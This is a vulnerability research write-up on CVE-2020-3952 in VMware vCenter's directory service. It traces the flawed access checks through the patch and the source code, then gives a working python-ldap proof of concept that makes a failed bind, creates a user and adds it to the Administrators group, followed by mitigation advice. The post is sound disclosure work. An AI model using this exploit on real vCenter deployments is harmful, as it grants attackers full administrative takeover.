Last Thursday, VMware published a security advisory for CVE-2020-3952, describing a “sensitive information disclosure vulnerability in the VMware Directory Service (vmdir)”. It’s a pretty terse advisory, and it doesn’t go into much more detail than that, besides stating that any vCenter Server v6.7 that has been upgraded from a previous version is vulnerable.

What’s striking about this advisory is that the vulnerability got a CVSS score of 10.0 — as high as this score can go. Despite the amount of press the advisory got, though, we couldn’t find anything written about the technical details of the vulnerability. We wanted to get a better understanding of its risks and to see how an attacker could exploit them, so we started investigating the changes in VMware’s recommended patch — vCenter Appliance 6.7 Update 3f.

By combing through the changes made to the vCenter Directory service, we reconstructed the faulty code flow that led to this vulnerability. Our analysis showed that with three simple unauthenticated LDAP commands, an attacker with nothing more than network access to the vCenter Directory Service can add an administrator account to the vCenter Directory. We were able to implement a proof of concept for this exploit that enacts a remote takeover of the entire vSphere deployment.


TL;DR


The vulnerability is enabled by two critical issues in vmdir’s legacy LDAP handling code:

  1. A bug in a function named VmDirLegacyAccessCheck which causes it to return “access granted” when permissions checks fail.
  2. A security design flaw which grants root privileges to an LDAP session with no token, under the assumption that it is an internal operation.

Looking into the patch


Since VMware releases its new versions as whole disk images rather than incremental patches, we had to diff between the previous version — Update 3e — and the new one. Mounting the disk images revealed that these releases are made up of a long list of RPMs, for the most part. Once we had extracted the contents of all of these packages, we could see which files had actually changed by comparing hashes side by side.

Unfortunately, it turned out that nearly 1500 files had changed since the last release — far more than we could check out by hand. we guessed that our culprit would probably have “vmdir” somewhere in its name. Sure enough, this cut down the results to a much more manageable list:



usr/lib/vmware-vmdir/lib64/libcsrp.a 
usr/lib/vmware-vmdir/lib64/libcsrp.la 
usr/lib/vmware-vmdir/lib64/libgssapi_ntlm.a 
usr/lib/vmware-vmdir/lib64/libgssapi_ntlm.la 
usr/lib/vmware-vmdir/lib64/libgssapi_srp.a 
usr/lib/vmware-vmdir/lib64/libgssapi_srp.la 
usr/lib/vmware-vmdir/lib64/libgssapi_unix.a 
usr/lib/vmware-vmdir/lib64/libgssapi_unix.la 
usr/lib/vmware-vmdir/lib64/libkrb5crypto.a 
usr/lib/vmware-vmdir/lib64/libkrb5crypto.la 
usr/lib/vmware-vmdir/lib64/libsaslvmdirdb.a 
usr/lib/vmware-vmdir/lib64/libsaslvmdirdb.la 
usr/lib/vmware-vmdir/lib64/libvmdirauth.a 
usr/lib/vmware-vmdir/lib64/libvmdirauth.la 
usr/lib/vmware-vmdir/lib64/libvmdirclient.a 
usr/lib/vmware-vmdir/lib64/libvmdirclient.la 
usr/lib/vmware-vmdir/lib64/libvmkdcserv.a 
usr/lib/vmware-vmdir/lib64/libvmkdcserv.la 
usr/lib/vmware-vmdir/sbin/vmdird  

So a list of statically linked libraries that are (presumably) built into a single compiled binary: vmdird. In other words, the vmdir server has changed since Update 3e. Looks promising!

Before doing a proper binary diff, we figured we’d see if there were any obvious changes made to exported symbols in vmdird. The results of this comparison were striking:



jj@ubuntu:~/misc/vms$ diff <(objdump -T patched_extracted/usr/lib/vmware-vmdir/sbin/vmdird | 
cut -f 2- -d " " | sort | uniq) <(objdump -T unpatched_extracted/usr/lib/vmware-vmdir/sbin/vmdird | cut -f 2- -d " " | sort | uniq) 1370a1371 > g    DF .text 00000000000000ce  Base        VmDirLegacyAccessCheck
1440d1440
< g DF .text 00000000000000ef Base VmDirLegacyAccessCheck 2194a2195 > g    DF .text 000000000000038d  Base        VmDirSrvAccessCheck
2199d2199
< g    DF .text 0000000000000393  Base        VmDirSrvAccessCheck

Nothing like a function named VmDirLegacyAccessCheck for vulnerability research! This seems like an especially good place to start, since VMware writes that “affected deployments will create a log entry when the vmdir service starts stating that legacy ACL mode is enabled.”

We laid out the disassembly of these functions in IDA. Here’s the unpatched version. We’ve highlighted anything that can change the function’s return value.



__int64 __fastcall VmDirLegacyAccessCheck(__int64 a1, __int64 a2, __int64 a3, 
unsigned int a4)
{
  unsigned int v5; // [rsp+14h] [rbp-2Ch]@1
  __int64 v6; // [rsp+18h] [rbp-28h]@1
   unsigned int v7; // [rsp+3Ch] [rbp-4h]@1

  v6 = a3;
  v5 = a4;
  v7 = 0;  // VMDIR_SUCCESS
  if ( !(unsigned __int8)sub_4EF7B1(a1, a2, a4)
    && v5 == 2
    && ((unsigned __int8)sub_4EF510(v6) || (unsigned __int8)sub_4EF218(v6) || (unsigned __int8)VmDirIsSchemaEntry(v6)) )
  {
    v7 = 9114;  // VMDIR_ERROR_UNWILLING_TO_PERFORM
    VmDirLog1(4);
  }
  return v7;
}

And this is the patched one:



__int64 __fastcall VmDirLegacyAccessCheck(__int64 a1, __int64 a2, __int64 a3, unsigned int a4)
{
  unsigned int v5; // [rsp+14h] [rbp-2Ch]@1
  __int64 v6; // [rsp+18h] [rbp-28h]@1
  unsigned int v7; // [rsp+3Ch] [rbp-4h]@1

  v6 = a3;
  v5 = a4;
  v7 = 9207;  // VMDIR_ERROR_INSUFFICIENT_ACCESS
  if ( a4 == 2
    && ((unsigned __int8)sub_4EF5B1(a3) || (unsigned __int8)sub_4EF2B9(v6) || (unsigned __int8)VmDirIsSchemaEntry(v6)) )
  {
    v7 = 9114;  // VMDIR_ERROR_UNWILLING_TO_PERFORM
    VmDirLog1(4);
  }
  else if ( (unsigned __int8)sub_4EF852(a1, a2, v5) )
  {
    v7 = 0;  // VMDIR_SUCCESS
  }
  else if ( v5 == 16 && (unsigned __int8)sub_4EF220(v6) )
  {
    v7 = 0;  // VMDIR_SUCCESS
  }
  return v7;
}

In the patched version, VmDirLegacyAccessCheck returns 9207 (VMDIR_ERROR_INSUFFICIENT_ACCESS) if none of the conditions are met. Looking for this return value, which didn’t exist in the previous version of the function, led us to a Github project under the name Lightwave. As it turns out, vmdir’s code has been made available by VMware on their Github repository.


To the source code we go


We were happy to discover VmDirLegacyAccessCheck source code in VMWare’s repository. Not only that, the code at hand fits the newly patched version of the function. Looking when this fix was introduced led us to a commit dated to August 2017 (!) with the following message:


There is a bug in legacy scheme implementation that this diff address.

Test:
1. create a normal user,say testuser1, in old DB + LW 1.2 binary setup.
2. before the fix, testuser1 has more permission than desired.
3. after the fix, testuser1 can only read/write to its own entry and nothing else.


So at least one developer at VMware was aware that there’s something wrong here — before the fix, a legacy-mode access “has more permission than desired.”



Before the fix, the return value of VmDirLegacyAccessCheck held a success value by default. Failing the permissions check by _VmDirAllowOperationBasedOnGroupMembership left the return value unchanged at 0 (VMDIR_SUCCESS), eventually granting access to the operation.

We now have a function that seems vulnerable. Let’s find out when it’s called, and how we can take advantage of it.


Obtaining a vulnerable vCenter


We only had a vCenter Server 6.7 from a clean installation and not an upgraded one from a previous release line (6.5 or 6.0). According to VMware, on vulnerable systems, you can find a certain log line under /var/log/vmware/vmdird/vmdird-syslog.log (or %ALLUSERSPROFILE%\VMWare\vCenterServer\logs\vmdird\vmdir.log on Windows):



2020-04-06T17:50:41.860526+00:00 info vmdird  t@139910871058176: ACL MODE: Legacy

As our vCenter Server was not vulnerable – the log file was missing this line. Looking for the code that prints this log line led us to a function named _VmDirIsLegacyACLMode:



static
BOOLEAN
_VmDirIsLegacyACLMode(
    VOID
    )
{
...

    dwError = VmDirBackendUniqKeyGetValue(
                VMDIR_KEY_BE_GENERIC_ACL_MODE,  // "acl-mode"
                &pValue);
...

    // We should have value "enabled" found for ACL enabled case.
    bIsLegacy = VmDirStringCompareA(pValue, VMDIR_ACL_MODE_ENABLED, FALSE) != 0;
…
    if (bIsLegacy)
    {
        VMDIR_LOG_INFO(VMDIR_LOG_MASK_ALL, "ACL MODE: Legacy");
    }
...
}

The code implies that there’s a key-value store somewhere that should have the string “acl-mode” and “enabled” (for non-legacy mode) or “disabled” (for legacy mode). Sure enough, “acl-modeenabled” showed up a number of times in our (patched) vmdir database file, /storage/db/vmware-vmdir/data.mdb. Changing the “enabled” part of this string to anything else (“disabled” would change string’s size, so we didn’t go with that) and restarting vmdir made the desired log line show up in vmdird-syslog.log.

This explains why only upgraded vCenter Server 6.7 machines are vulnerable to this attack, and not clean installs of this version. The vmdird binary is still vulnerable on upgraded 6.7 machines. What has changed is the ACL mode configuration. Clean installations default to non-legacy mode (acl-mode is enabled), but upgrades preserve the previous configuration, where legacy mode is enabled by default.

We now have a vulnerable machine. But what is it vulnerable to?


Exploitation


At this point, we need to find out how to trigger the code flow that ends up in the vulnerable function VmDirLegacyAccessCheck.



As we can see in the call graph, add, modify, and search requests can all go through VmDirLegacyAccessCheck.


First attempts


We installed ldap-utils and tried to add a user to the vCenter machine using incorrect credentials:



root@computer:~# ldapadd -x -w 1234 -f hacker.ldif -h 192.168.1.130
 -D"cn=Administrator,cn=Users,dc=vsphere,dc=local"
ldap_bind: Invalid credentials (49)

That didn’t get very far. Let’s see what the vmdird log has to say:



2020-04-15T14:20:56.079504+00:00 info vmdird  t@140564750137088: Bind failed () 
(9234)
2020-04-15T14:20:56.080409+00:00 err vmdird  t@140564750137088: 
VmDirSendLdapResult: Request (Bind), Error (49), Message (), (0) socket 
(192.168.0.254)
2020-04-15T14:20:56.080832+00:00 err vmdird  t@140564750137088: Bind Request 
Failed (192.168.0.254) error 49: Protocol version: 3, Bind DN: 
"cn=Administrator,cn=Users,dc=vsphere,dc=local", Method: Simple

It seems like we never actually reached the “add” part of this request. ldapadd first needs to bind to the server before it can run any commands against it, but the binding fails with error 9234 — VMDIR_ERROR_USER_INVALID_CREDENTIAL. Is there a way to skip the bind stage?

We installed python-ldap and tried doing it ourselves:



dn = 'cn=Hacker,cn=Users,dc=vsphere,dc=local'
modlist = {
    'userPrincipalName': ['hacker@VSPHERE.LOCAL'],
    'sAMAccountName': ['hacker'],
    'givenName': ['hacker'],
    'sn': ['vsphere.local'],
    'cn': ['Hacker'],
    'uid': ['hacker'],
    'objectClass': ['top', 'person', 'organizationalPerson', 'user'],
    'userPassword': 'TheHacker1!'
}

c = ldap.initialize('ldap://192.168.1.130')
c.add_s(dn, ldap.modlist.addModlist(modlist))

Traceback (most recent call last):
  File "do_ldap.py", line 27, in 
    print c.add_s(dn, ldap.modlist.addModlist(modlist))
...
ldap.INSUFFICIENT_ACCESS: {'info': u'Not bind/authenticate yet', 'desc': u'Insufficient access'}

Another no-go. Here’s the matching log from the VCenter server:



2020-04-15T14:32:21.526506+00:00 err vmdird  t@140565521872640: 
VmDirSendLdapResult: Request (Add), Error (50), Message (Not bind/authenticate yet), (0) socket (192.168.0.254)

Bind/authenticate time


Looking for the error message “Not bind/authenticate yet” inside the code leads us to the function VmDirMLAdd.



int
VmDirMLAdd(
    PVDIR_OPERATION pOperation
    )
{
    ...
    // AnonymousBind Or in case of a failed bind, do not grant add access
    if (pOperation->conn->bIsAnonymousBind || VmDirIsFailedAccessInfo(&pOperation->conn->AccessInfo))
    {
        dwError = LDAP_INSUFFICIENT_ACCESS;
        BAIL_ON_VMDIR_ERROR_WITH_MSG(
                dwError, pszLocalErrMsg,
                "Not bind/authenticate yet");
    }

    ...

    dwError = VmDirInternalAddEntry(pOperation);
    BAIL_ON_VMDIR_ERROR(dwError);
    ...
}

As the code shows, two conditions must hold in order for the client to be able to add an entry:

  1. The LDAP session must not be anonymous, namely, it has to specify a domain;
  2. The session should not have “failed access info”.

Let’s start with passing the first condition. For that, we need bIsAnonymousBind to be FALSE. The only code that sets this variable to FALSE is in VmDirMLBind:



int
VmDirMLBind(
   PVDIR_OPERATION   pOperation
   )
{
    ...
    pOperation->conn->bIsAnonymousBind = TRUE;  // default to anonymous bind

    switch (pOperation->request.bindReq.method)
    {
        case LDAP_AUTH_SIMPLE:
                  ...
                  pOperation->conn->bIsAnonymousBind = FALSE;
                  dwError = VmDirInternalBindEntry(pOperation);
                  BAIL_ON_VMDIR_ERROR(dwError);
                  ...

                break;

        case LDAP_AUTH_SASL:
                pOperation->conn->bIsAnonymousBind = FALSE;
                dwError = _VmDirSASLBind(pOperation);
                BAIL_ON_VMDIR_ERROR(dwError);
               ...
                break;

       ...
    }
    ...
}

Notice that bIsAnonymousBind is assigned FALSE whether or not VmDirInternalBindEntry succeeds. In other words, even if we fail our bind authentication, we’ll pass the first part of the condition.

Now for the second part of that condition. What does VmDirIsFailedAccessInfo do? Surprisingly, not much:



/* Check whether it is a valid accessInfo
 * (i.e.: resulted by doing a successful bind in an operation) */
BOOLEAN
VmDirIsFailedAccessInfo(
    PVDIR_ACCESS_INFO   pAccessInfo
    )
{

    BOOLEAN     bIsFaliedAccessPermission = TRUE;

    if ( ! pAccessInfo->pAccessToken )
    {   // internal operation has NULL pAccessToken, yet we granted root privilege
        bIsFaliedAccessPermission = FALSE;
    }
    else
    {   // coming from LDAP protocol, we should have BIND information
        if ( ! IsNullOrEmptyString(pAccessInfo->pszBindedObjectSid)
             &&
             ! IsNullOrEmptyString(pAccessInfo->pszNormBindedDn)
             &&
             ! IsNullOrEmptyString(pAccessInfo->pszBindedDn)
           )
        {
            bIsFaliedAccessPermission = FALSE;
        }
    }

    return bIsFaliedAccessPermission;
}

In order to reach the user addition flow, we need to make it return FALSE somehow. Let’s take a look at the first way out — checking for a NULL access token.

It seems strange that a function that checks whether to grant access would specifically allow a user without an access token. From the brief comment below the check, it looks like this case was intended for “internal operations”. Presumably an LDAP launched internally by vmdird would leave pAccessToken empty to mark that it should be allowed through, and any other access would fail at the bind stage earlier. This is a strange way to do this; it would be much clearer to make a designated pAccessInfo->bIsInternalOperation field for this purpose.

When binding fails, pAccessInfo->pAccessToken is left empty. Here’s VmDirInternalBindEntry, which is called by VmDirMLBind from vmdird’s message loop.



* Return: VmDir level error code.  Also, pOperation->ldapResult content is set.
 */
int
VmDirInternalBindEntry(
    PVDIR_OPERATION  pOperation
    )
{
    DWORD                   retVal = LDAP_SUCCESS;
    ...

    // Normalize DN
    retVal = VmDirNormalizeDN( &(pOperation->reqDn), pOperation->pSchemaCtx );
    BAIL_ON_VMDIR_ERROR_WITH_MSG( retVal, pszLocalErrMsg, "DN normalization failed - (%u)(%s)", retVal, VDIR_SAFE_STRING(VmDirSchemaCtxGetErrorMsg(pOperation->pSchemaCtx)) );

...

cleanup:

    VMDIR_SAFE_FREE_MEMORY( pszLocalErrMsg );
    VmDirFreeEntryContent ( &entry );
    return retVal;

error:
    ...
    if (retVal)
    {
        VmDirFreeAccessInfo(&pOperation->conn->AccessInfo);

        VMDIR_LOG_INFO(VMDIR_LOG_MASK_ALL,
                        "Bind failed (%s) (%u)",
                        VDIR_SAFE_STRING(pszLocalErrMsg), retVal);
        retVal = LDAP_INVALID_CREDENTIALS;
        ...
    }

    VMDIR_SET_LDAP_RESULT_ERROR(&(pOperation->ldapResult), retVal, pszLocalErrMsg);
    goto cleanup;
}

Our incorrect credentials fail all the way up at VmDirNormalizeDN. This takes us to the error flow, which cleans out pOperation->conn->AccessInfo->pAccessToken.

Let’s go back to our double condition:



if (pOperation->conn->bIsAnonymousBind || 
VmDirIsFailedAccessInfo(&pOperation->conn->AccessInfo))

Both parts of the condition now hold.

So we can’t just skip binding and expect things to work, but it does seem like even a failed bind attempt will take us through this check.


The part where everything comes together


Where does all of this get us, though? We’re finally reaching our buggy VmDirLegacyAccessCheck. Before performing the add operation, VmDirInternalAddEntry calls VmDirSrvAccessCheck which in turn calls VmDirLegacyAccessCheck.

In theory we should have failed to reach this flow long ago; VmDirLegacyAccessCheck is the last line of defense. Its job is to check that this particular type of access — adding or modifying an LDAP entry — should be allowed by this particular user. The authentication check shouldn’t have allowed us to get here in the first place, but you would still expect this check to prevent us from moving onwards.

Remember this, though?


There is a bug in legacy scheme implementation that this diff address.

Test:
1. create a normal user,say testuser1, in old DB + LW 1.2 binary setup.
2. before the fix, testuser1 has more permission than desired.
3. after the fix, testuser1 can only read/write to its own entry and nothing else.


That looks like the last link we need in our chain. If VmDirLegacyAccessCheck always lets us through, the access check should succeed, and our user should be added.

What happens, then, if we ignore the result from bind?



c = ldap.initialize('ldap://192.168.1.130')
try:
  c.simple_bind_s(dn, 'fakepassword')
except:
  pass
c.add_s(dn, ldap.modlist.addModlist(modlist))

Huh. No output for this in /var/log/vmware/vmdird/vmdird-syslog.log. Can we see this user with a search request?



root@computer:~# ldapsearch -b "cn=Hacker,cn=Users,dc=vsphere,dc=local" -s sub -D "cn=Administrator,cn=Users,dc=vsphere,dc=local" -h 192.168.1.130 -x -w 
# extended LDIF
#
# LDAPv3
# base <cn=Hacker,cn=Users,dc=vsphere,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# Hacker, Users, vsphere.local
dn: cn=Hacker,cn=Users,dc=vsphere,dc=local
nTSecurityDescriptor:: ...
krbPrincipalKey:: ...
sn: vsphere.local
userPrincipalName: hacker@VSPHERE.LOCAL
cn: Hacker
givenName: hacker
uid: hacker
sAMAccountName: hacker
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

No kidding. What happens if we try to connect to vSphere with this new user?



Where does one get “permissions on any vCenter Server system connected to this client”? Let’s add our Hacker user to the Administrator group with the same unauthenticated connection:



groupModList = [(ldap.MOD_ADD, 'member', [dn])]
c.modify_s('cn=Administrators,cn=Builtin,dc=vsphere,dc=local', groupModList)

Let’s try the login again:



We’re in!


Implementation


We put together an exploitation script that runs all of these stages so you can try it yourself. Check out our github repository over here.


Mitigation – patch and segment


The most effective measure for mitigating the above-demonstrated risk is to install the latest patch for the vulnerable version of vCenter Server. Alternatively, installing the latest version (7.0) will also result in a secure vSphere deployment.
We highly recommend to limit access to vCenter’s LDAP interface. In practice, this means blocking any access over the LDAP port (389) except for administrative use.

If you have any questions regarding how to segment your network to avoid this attack and others, don’t hesitate to contact us.


Some thoughts


This was some rabbit hole. Despite the relative clarity of VMware’s code, it looks like there were quite a few missteps that went into the vulnerability. The developers were at least partially aware of them, too, as we saw in the code comments and commit messages. The fix to VmDirLegacyAccessCheck isn’t any more than band-aid — had VMware looked into this bug in-depth they would have found a series of issues that need to be addressed: the strange semantics of bIsAnonymousBind, the disastrous handling of pAccessToken, and, of course, the bug we started from, in VmDirLegacyAccessCheck.

Perhaps the most distressing thing, though, is the fact that the bugfix to VmDirLegacyAccessCheck was written nearly three years ago, and is only being released now. Three years is a long time for something as critical as an LDAP privilege escalation not to make it into the release schedule — especially when it turns out to be much more than a privilege escalation.

We hope this was an enjoyable read. We believe there are still quite a few research leads left open here — check out Project Lightwave. Happy hunting!